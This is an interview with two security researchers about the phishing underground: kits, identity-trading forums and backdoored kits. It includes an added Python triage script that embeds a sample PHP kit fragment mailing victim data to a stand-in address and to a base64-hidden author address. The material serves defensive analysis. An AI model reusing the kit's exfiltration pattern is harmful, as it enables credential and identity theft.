Interview with Nitesh Dhanjani and Billy Rios, Spies in the Phishing Underground


Both Nitesh and Billy are well-known security researchers who recently managed to infiltrate the phishing underground. What started as a simple examination of phishing sites turned into an extraordinary view of the ecosystem that supports the phishing effort plaguing modern-day financial institutions and their customers.

They saw an extraordinary amount of sensitive customer account information, obtained the latest phishing kits, located and examined the tools used by phishers, trolled sites buying and selling identities, and even social engineered a few scammers.

In this interview, they expose the tactics and tools that phishers use, illustrate what happens when your confidential information gets stolen, discuss how phishers communicate and even how they phish each other.

What are phishing kits and how are they distributed?

Dhanjani: A phishing kit is the most important tool in a phisher’s arsenal. Think of a popular company that executes financial transactions on the web. All the source code and static content such as images and logos needed to set up a phishing site for the company you just thought of is most likely present in a phishing kit. Let us suppose you get hold of such a kit and you want to deploy a phishing site. All you would have to do is the following: 1) unzip the kit; 2) pick the directory corresponding to the company you want to target; 3) edit a single file in the directory to input the email address you want the results emailed to; 4) deploy the directory onto a compromised host on the internet, and voila! – you have yourself a phishing site. If you take a look at the client-side code (HTML and JavaScript) presented to your browser on a phishing site that targets a particular company, you will notice that other phishing sites that target the same company have similar characteristics. This is because, more often than not, the sites are deployed using popular phishing kits. The code within the kits is quite simple, mostly consisting of a web form that does the dirty work, along with image files and static content. The kits are often distributed amongst the phisher communities on message boards, and at times sold or traded for money or identities.

Rios: Phishing kits are the tip of the iceberg; they are the piece of the phishing ecosystem that everyone sees and knows about. The typical phishing kit consists of the HTML that makes up the forged site that the user sees and the backend logic that is used to steal the victim’s information. Most phishing kits are probably created by a small number of individuals and typically sold on phishing forums. Although the various kits have different front ends and HTML content, the back-end logic is surprisingly similar for most of the kits we’ve seen. These kits are used over and over again, and most of the phishing sites you’ve seen are probably a variant of a small set of phishing kits. Many think that phishing sites are all custom jobs that a particular phisher has developed and deployed. The reality is that pre-made, ready-to-deploy, turnkey sites are already created for practically every major organization that you can think of. All a phisher has to do is purchase the latest kit and deploy it; no technical expertise or coding skills are really required. All the phisher typically has to do is place their email address into one line of code and they have a ready-to-deploy phishing site.

Many have become victims of phishing and we see the attackers using new methods all the time. In your opinion, what is their skill level? Who are we dealing with?

Dhanjani: This is an important question, and I’m glad you asked it. When we think of phishers, we often guess that they are a group of highly skilled ninja hackers. They have collectively caused billions of dollars in losses, and ruined the lives of many citizens whose identities they have stolen and abused. These people have got to be pretty smart, right? Wrong. Just think about what a typical phisher is really doing: installing pre-coded websites on compromised servers – that hardly takes any skill and it shouldn’t impress anyone. Then you have cases where phishers steal information from other phishers by planting backdoors in the phishing kits in the form of elementary obfuscation of scripting code. In other words, phishers are not able to pull off their attacks because they are highly skilled, but because they are abusing a few fundamental flaws such as lack of awareness, lack of standards around browser UI that clearly highlights high-assurance websites, and our dependence on static identifiers such as SSNs, credit card numbers, etc., to establish identities and commit financial transactions. I’ll expand my views on the static identifier problem in my answer to the last question.

Rios: This is one of the more surprising aspects of the research we (Nitesh and I) conducted. I had always thought that most phishers were clever hackers evading authorities using the latest evasion techniques and tools. The reality of the matter is that most of the phishers we tracked were sloppy and unsophisticated. The tools they used were rarely created by the phisher deploying the actual scam, and for the most part it seemed the phisher merely downloaded kits and tools from some place and reused them over and over and over again. It also seemed that many phishers don’t even really understand how the phishing kits they’ve deployed work! We also came across many phishing kits and tools that had simple backdoors written into the source code (essentially, phishers phishing phishers). These backdoors are easily spotted by anyone who has even a basic idea of how the source code flow works, yet they went undetected by many phishers. Maybe a few phishers out there are skilled, but the majority are clueless.

During your research, how did you track phishers? What are their most common information trade networks?

Dhanjani: I clearly remember how we stumbled upon this information. We happened to be studying a simple server-side script from a phishing kit. The script was part of a ready-made site for a popular bank. All the script did was take the information submitted by the victim and email it to the phisher at a particular email address. We noticed that the script put some static text in the subject line of the outgoing email in order to help the phisher identify the emails. We decided to Google for that particular string. The results completely stunned us. Social Security numbers, bank account numbers, dates of birth, ATM PINs, addresses, credentials to online banking accounts, all out in the open, a lot of which had been collected from victims only a few hours earlier. A simple Google search led us to a whole new world where phishers were trading this information in different languages around the world. This sort of exposure can ruin people’s lives – yet it was right there, out in the open. It was quite unnerving.

Rios: Even phishers need to communicate! Many think that phishers are anti-social lone individuals sitting in a dark basement in some dark corner of the world. The reality is that there are entire social networks dedicated to helping phishers communicate details on new scams and phishing kits, and to buy and sell identities. Many of these conversations occur on publicly accessible forums and websites, but the difficult part is knowing where to find these forums and sites. As everyone knows, search engines are great at crawling the most obscure sites on the Internet. Once we had an opportunity to see the source code of a few kits, we could key off of some key signatures, which resulted in our favorite search engine leading us to forums where phishing scams were being discussed and websites where identities were being bought and sold. Once we had access to these forums, we then had another set of key signatures (phisher aliases, handlers, more phishing kits, jargon, etc.) to find even more forums and sites, which basically led us into what seems like a never-ending spiral of phishing and ID theft forums and sites.

Let’s say your identity gets stolen, what happens next? How exactly does a phisher benefit from gaining access to your sensitive information? What can he do?

Dhanjani: As soon as your identity is stolen, it becomes currency for the phishers. Phishers often trade identities with each other, and sell them. Some of the more “charitable” phishers publish the identities on message boards to share with the community. Once a malicious entity has obtained your identity, he or she can open credit lines in your name, in addition to obtaining loans and executing financial transactions on your behalf. It doesn’t stop there: a stolen identity can also be abused to obtain legal identity cards with your name on them, thereby cloning your identity. This is often used by people who want to avoid arrest (the irony!), or to establish a brand new identity to live on. Unfortunately, it takes a lot of legal effort on the part of the victims to repair the damage caused to their lives by identity theft.

Rios: In my opinion, this was the most interesting portion of our research. Many see phishing as merely forged websites with familiar logos. In reality, there is an entire ecosystem supporting phishers and their scams. Hackers compromise servers and turn-key backdoors are placed on these compromised servers. Before a phishing site can be deployed, phishers buy or trade access to compromised systems. Once the phisher gains access to a compromised machine, they deploy their ready-made kits. A single server is typically used to serve many different scams/phishing sites simultaneously. Once an unsuspecting user is lured to a phishing site and enters their information into the forged site, it kicks off a series of events that ultimately lead to very bad things for the victim. Typically, the information entered into a phishing site is emailed to an anonymous email account (we’ve seen other methods, but this is the most popular). From here, the phisher visits several places, advertising that they have identity information for sale. These identities are purchased by other individuals who then visit sites dedicated to creating fake credit cards and ID theft. The stolen information changes hands several times to all sorts of different characters and then the vicious cycle repeats itself.

Your research shows that even phishing sites have backdoors, which means that phishers are trying to phish other phishers. Give us some details.

Dhanjani: Indeed. This goes back to the previous point I made about phishers being less sophisticated than people think. We came across backdoors in phishing kits that were simple code obfuscations that caused the script to send the victim’s information to the kit’s author (backdoor) in addition to the phisher installing the kit. We found deployed versions of the kits that clearly indicated confusion on the part of the phisher who deployed the site: some phishers commented out portions of the code, while some seemed to edit the script around where the backdoor code was present, indicating suspicion. Many phishers never realized the backdoor code was present.

Rios: The number of backdoors we saw was staggering. The servers serving the phishing sites had backdoors, the code used in the phishing kits had backdoors, the tools used by phishers had backdoors. Phishers aren’t afraid to steal from regular people and they are also not afraid to steal from other phishers. Some of the backdoors were meant to keep control over a compromised server, while others simply stole information that had been stolen by other phishers! We came across several forums where phishers, scammers, and carders basically identified other phishers, scammers, and carders that had scammed them. These shady characters may work with each other but they sure don’t trust each other, that’s for sure.
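The two behaviours described in this interview, the kit mailing every submission to an address the phisher edits into one line of the script with a static subject-line marker, and the kit author hiding a second, obfuscated recipient as a backdoor, are both things an incident responder looks for when triaging a recovered kit. The following Python script is an added example, not code from the interview or from any real kit: it takes a constructed PHP fragment (with hypothetical example.net/example.org addresses and a made-up subject string) and recovers the plainly written recipient, any recipient concealed behind base64, and the static part of the subject line that could serve as a search fingerprint. The regular expressions and the base64 heuristic are assumptions about how such kits are written, chosen to match the simple obfuscation the interview describes.

```python
import base64
import re

# Constructed sample, modelled on the result-mailing step of a phishing kit:
# the first mail() recipient is the one the deploying phisher edits in;
# the second is hidden behind base64_decode() and goes to the kit's author.
# Addresses and the subject marker are made up for this example.
SAMPLE_KIT_SOURCE = r'''<?php
$subject = "ReZulT frOm $ip";
$to = "drop-address@example.net";
mail($to, $subject, $message);
$x = base64_decode("YmFja2Rvb3ItYXV0aG9yQGV4YW1wbGUub3Jn");
mail($x, $subject, $message);
?>'''

# Assumed patterns: a loose e-mail matcher, a run of base64 alphabet long
# enough to hold an address, and a PHP-style $subject assignment.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
SUBJECT_RE = re.compile(r'\$subject\s*=\s*"([^"]*)"')
PHP_VAR_RE = re.compile(r"\$\w+")


def plain_recipients(src: str) -> list[str]:
    """Addresses written in clear text anywhere in the kit source."""
    return sorted(set(EMAIL_RE.findall(src)))


def decoded_recipients(src: str) -> list[str]:
    """Addresses that only appear after base64-decoding string literals."""
    found = set()
    for blob in B64_RE.findall(src):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
            continue
        found.update(EMAIL_RE.findall(text))
    return sorted(found)


def subject_fingerprints(src: str) -> list[str]:
    """Static part of each $subject literal, with interpolated $vars removed.

    This is the kind of fixed string a kit leaves in every outgoing mail,
    which the interview describes searching for to locate leaked data."""
    marks = []
    for literal in SUBJECT_RE.findall(src):
        static = PHP_VAR_RE.sub("", literal).strip()
        if static:
            marks.append(static)
    return marks


def analyze_kit(src: str) -> dict:
    """Summarise where a kit sends its results and how its mails can be recognised."""
    plain = plain_recipients(src)
    hidden = [addr for addr in decoded_recipients(src) if addr not in plain]
    return {
        "plain": plain,                      # what the deploying phisher sees
        "hidden": hidden,                    # the author's backdoor recipients
        "subject_fingerprints": subject_fingerprints(src),
    }


if __name__ == "__main__":
    report = analyze_kit(SAMPLE_KIT_SOURCE)
    for key, values in report.items():
        print(f"{key}: {', '.join(values) or '(none)'}")
```

Run against a real kit the same way (read the file contents into `src`); a non-empty `hidden` list is the signal that the kit is exfiltrating to someone other than the person who deployed it, and every recovered address and subject marker is a takedown lead to hand to the mail provider or search-engine abuse desk rather than something to keep.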

There are many anti-phishing plugins available for browsers. Are they really all the protection we need?

Dhanjani: The anti-phishing plugins are extremely useful and I sincerely appreciate their efforts. However, it is extremely important to realize that the anti-phishing plugins are a band-aid over underlying problems that must be addressed if we want to come close to solving the phishing problem. We need to do a better job with respect to user awareness, but we must be careful not to expect too much from the average user. We cannot expect the average user to be able to analyze a URL to ensure it is legitimate. Instead we need to come up with browser UI standards that allow users to clearly and easily distinguish high-assurance domains and websites. Most importantly, we need to realize the actual problem at hand: the reliance on static identifiers to establish and maintain identities and execute financial transactions. I will expand on this in the following question.

I’d also like to add that phishers are likely to abuse the blacklists published for these plugins for their own benefit. The blacklists are a list of known phishing sites that the plugins consume in order to identify what websites are fraudulent. These blacklists therefore contain IP addresses and host names of servers hosting phishing sites. Since phishing sites are commonly installed on servers that have been compromised, and phishers don’t bother to patch systems they have installed their kits on, this list translates to a ‘list of easily compromisable hosts’ for other phishers. This situation can lead to multiple phishers obtaining access to the same host after the first one has broken in. However, I think the benefits of anti-phishing plugins outweigh this negative side-effect.

What is, currently, the magnitude of the phishing threat? What can we expect during this year?

Dhanjani: I think the phishing problem is going to continue to grow, and continue to cost us billions of dollars this year and even more so every year moving forward. We can expect the phishers to continue to use similar techniques for a while to come. But what do we do to solve this problem? Well, we can apply as many temporary band-aid solutions as we want, such as host intrusion prevention systems and browser plugins, and we can perform penetration tests on our servers and applications all we want, but these solutions alone are not enough to even come close to solving the actual problem. We are not going to win the arms race with the phishers unless we admit to the underlying problem at hand: the reliance on static identifiers to establish identities and execute financial transactions. Let me expand on this a bit. We take care not to blurt out our SSN to anyone on the street, yet it is likely to be stored in hundreds of corporate databases as we progress in our lives. We take care not to expose our credit card numbers, but we must hand them over to people we don’t know at retail stores if we want to use them. We aren’t going to solve the problem of online PII (Personally Identifiable Information) and identity theft just by writing even more secure code (although it certainly helps), or by continuing to play whack-a-mole with phishers. The system of relying on static identifiers to commit financial transactions needs to be rethought.

Commercial financial institutions such as credit card companies and banks realize that the cost of implementing a new system that does not merely rely on static identifiers is higher than the fraud committed, so they decide to accept the cost. This is the reason why the system has not changed. Unfortunately, financial institutions only take into account their cost when making this decision, but it also ends up affecting the lives of millions of people who have to pay with their identities when such fraud is committed (this cost is also shared by other companies that want to have the capacity to process transactions. The PCI standard is a good example of this situation).

For the next few years, we are going to continue to apply band-aids around the problem of data leakage, and continue to play whack-a-mole with the phishers without solving the actual problem at hand. In order to make any significant progress, we must come up with a brand new system that does away with depending on static identifiers. We will know we’ve accomplished this when we are able to publish our credit reports publicly without fearing for our identities.